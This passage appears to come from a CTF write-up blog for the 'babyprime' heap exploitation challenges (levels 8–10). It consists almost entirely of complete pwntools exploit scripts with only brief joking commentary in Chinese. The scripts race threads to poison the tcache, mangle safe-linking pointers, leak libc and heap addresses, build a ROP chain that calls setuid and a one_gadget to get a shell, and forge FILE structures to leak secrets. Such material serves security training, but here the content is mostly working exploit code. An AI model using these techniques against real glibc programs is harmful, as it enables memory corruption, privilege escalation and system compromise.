thread[0].success(f"libc: {hex(libc.address)}") thread[0].success(f"heap_ptr: {hex(heap_ptr)}") thread[0].success(f"__GI__IO_wfile_overflow: {hex(__GI__IO_wfile_overflow)}")
raw_input("DEBUG") malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
arbitrary_read(2, 4, mangle(pos, heap_ptr)) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little") - 0x530 empty_buffer = heap + 0x1000
thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"empty_buffer: {hex(empty_buffer)}")
raw_input("DEBUG") malloc(0, 3) malloc(0, 5) free(0, 5) free(0, 3)
# 0x7fbcf9683b94 <_IO_wdoallocbuf+36> mov rax, qword ptr [rax + 0xe0] # ► 0x7fbcf9683b9b <_IO_wdoallocbuf+43> call qword ptr [rax + 0x68]
leave_ret = libc.address + 0x4DA83 pop_rdi_ret = libc.address + 0x2A3E5 pop_rsi_ret = libc.address + 0x2BE51 pop_rbp_ret = libc.address + 0x2A2E0 pop_rax_ret = libc.address + 0x45EB0 one_gadget = libc.address + 0xEBD43 dup2 = libc.sym["dup2"] syscall_ret = libc.address + 0x91316
payload = flat( { 0x68: leave_ret, 0xE0: empty_buffer, 0xE8: pop_rdi_ret, 0xF0: 5, 0xF8: pop_rsi_ret, 0x100: 0, 0x108: dup2, 0x110: pop_rsi_ret, 0x118: 1, 0x120: dup2, 0x128: pop_rdi_ret, 0x130: 0, 0x138: pop_rax_ret, 0x140: constants.SYS_setuid, 0x148: syscall_ret, 0x150: one_gadget, }, filler=b"\x00", ) arbitrary_write(3, 5, mangle(pos, empty_buffer), payload)
raw_input("DEBUG") malloc(0, 6) malloc(0, 7) free(0, 7) free(0, 6)
fp = FileStructure() fp._lock = heap + 0x2000 fp._wide_data = empty_buffer fp.vtable = __GI__IO_wfile_overflow
fp._IO_read_ptr = pop_rbp_ret fp._IO_read_end = heap + (0x1000 + 0xE8) - 0x8 fp._IO_read_base = leave_ret
arbitrary_write(6, 7, mangle(pos, thread_stdout + 0x3), bytes(fp))
# thread[0].clean() printf(0, 0)
thread[0].interactive()
if __name__ == "__main__": main()Level 8
Information
- Category: Pwn
Description
Create and use arbitrary read/write primitives to obtain the flag.
Write-up
笑死了,这回我学聪明了,鉴于这题的 description 和上题一样,而上题我写的 exp 又是拿 shell 的通解,且题目使用的 libc 版本都一样,我直接不看题,用上题的 exp 去跑,然后……通了!LMAO
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, FileStructure, constants, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level8.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content): thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content): arbitrary_read(poison_idx, result_idx, addr) raw_input("RAW SCANF") scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos) main_arena_ptr = heap - 0xAA1 thread_stdout = heap - 0x5F1
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}") thread[0].success(f"thread_stdout: {hex(thread_stdout)}")
raw_input("DEBUG") malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)) thread[0].recvuntil(b"MESSAGE: ") libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80 heap_ptr = libc.address + 0x219CE0 __GI__IO_wfile_overflow = libc.address + 0x215FE0
thread[0].success(f"libc: {hex(libc.address)}") thread[0].success(f"heap_ptr: {hex(heap_ptr)}") thread[0].success(f"__GI__IO_wfile_overflow: {hex(__GI__IO_wfile_overflow)}")
raw_input("DEBUG") malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
arbitrary_read(2, 4, mangle(pos, heap_ptr)) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little") - 0x530 empty_buffer = heap + 0x1000
thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"empty_buffer: {hex(empty_buffer)}")
raw_input("DEBUG") malloc(0, 3) malloc(0, 5) free(0, 5) free(0, 3)
# 0x7fbcf9683b94 <_IO_wdoallocbuf+36> mov rax, qword ptr [rax + 0xe0] # ► 0x7fbcf9683b9b <_IO_wdoallocbuf+43> call qword ptr [rax + 0x68]
leave_ret = libc.address + 0x4DA83 pop_rdi_ret = libc.address + 0x2A3E5 pop_rsi_ret = libc.address + 0x2BE51 pop_rbp_ret = libc.address + 0x2A2E0 pop_rax_ret = libc.address + 0x45EB0 one_gadget = libc.address + 0xEBD43 dup2 = libc.sym["dup2"] syscall_ret = libc.address + 0x91316
payload = flat( { 0x68: leave_ret, 0xE0: empty_buffer, 0xE8: pop_rdi_ret, 0xF0: 5, 0xF8: pop_rsi_ret, 0x100: 0, 0x108: dup2, 0x110: pop_rsi_ret, 0x118: 1, 0x120: dup2, 0x128: pop_rdi_ret, 0x130: 0, 0x138: pop_rax_ret, 0x140: constants.SYS_setuid, 0x148: syscall_ret, 0x150: one_gadget, }, filler=b"\x00", ) arbitrary_write(3, 5, mangle(pos, empty_buffer), payload)
raw_input("DEBUG") malloc(0, 6) malloc(0, 7) free(0, 7) free(0, 6)
fp = FileStructure() fp._lock = heap + 0x2000 fp._wide_data = empty_buffer fp.vtable = __GI__IO_wfile_overflow
fp._IO_read_ptr = pop_rbp_ret fp._IO_read_end = heap + (0x1000 + 0xE8) - 0x8 fp._IO_read_base = leave_ret
arbitrary_write(6, 7, mangle(pos, thread_stdout + 0x3), bytes(fp))
# thread[0].clean() printf(0, 0)
thread[0].interactive()
if __name__ == "__main__": main()Level 9
Information
- Category: Pwn
Description
Create and use arbitrary read/write primitives with less control of the heap.
Write-up
堆噪声是吧,看上去好像很可怕,也只是看上去罢了。实际上这干扰有和没有都没啥区别……至少在这题里是这样的。
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level9.1"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content): thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, flag): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", flag)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content): arbitrary_read(poison_idx, result_idx, addr) raw_input("RAW SCANF") scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") flag = (pos << 12) + 0xBD0
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"flag: {hex(flag)}")
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
arbitrary_read(0, 1, mangle(pos, flag + 0x10))
thread[0].recvuntil(b"MESSAGE: ") secret = thread[0].recvline() send_flag(0, secret)
quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 10
Information
- Category: Pwn
Description
Create and use arbitrary read/write primitives with less control of the heap II.
Write-up
吃屎吃的最难受的一集。
不想破伪随机数发生器,那就想办法确定你能确定的,想办法猜出你不能确定的(
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, FileStructure, context, flat, os, process, raw_input, remote, sys,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level10.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content): thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): global rand_size
BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
# raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content): arbitrary_read(poison_idx, result_idx, addr) # raw_input("RAW SCANF") scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
thread[0].recvuntil(b"Your flag is: ") flag_p0 = thread[0].recvuntil(b"..!\n")[:-4] thread[0].success(f"flag_p0: {flag_p0}")
malloc(0, 0) free(0, 0) malloc(0, 0) printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = pos << 12
hexpos = hex(pos)[2:] if len(hexpos) != 9: thread[0].failure(f"invalid pos (need equal to 9 hex digits): {hex(pos)}") try: thread[0].close() thread[1].close() except: pass os.execv(sys.executable, [sys.executable] + sys.argv)
thread_stdout = heap - 0x102B0 secret = thread_stdout + 0x3C0
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"stdout: {hex(thread_stdout)}") thread[0].success(f"secret: {hex(secret)}")
expected_low = 0x0D50 low_16 = thread_stdout & 0xFFFF
if low_16 != expected_low: thread[0].failure(f"bad stdout low bits: {hex(low_16)} != {hex(expected_low)}")
try: thread[0].close() thread[1].close() except: pass
os.execv(sys.executable, [sys.executable] + sys.argv)
# raw_input("DEBUG") malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
fp = FileStructure() fp.write(secret, 0x100) fp.fileno = 5
arbitrary_write( 2, 4, mangle((pos) - 0x3, thread_stdout), fp.struntil("_flags2"), ) malloc(0, 10)
thread[0].interactive()
if __name__ == "__main__": main()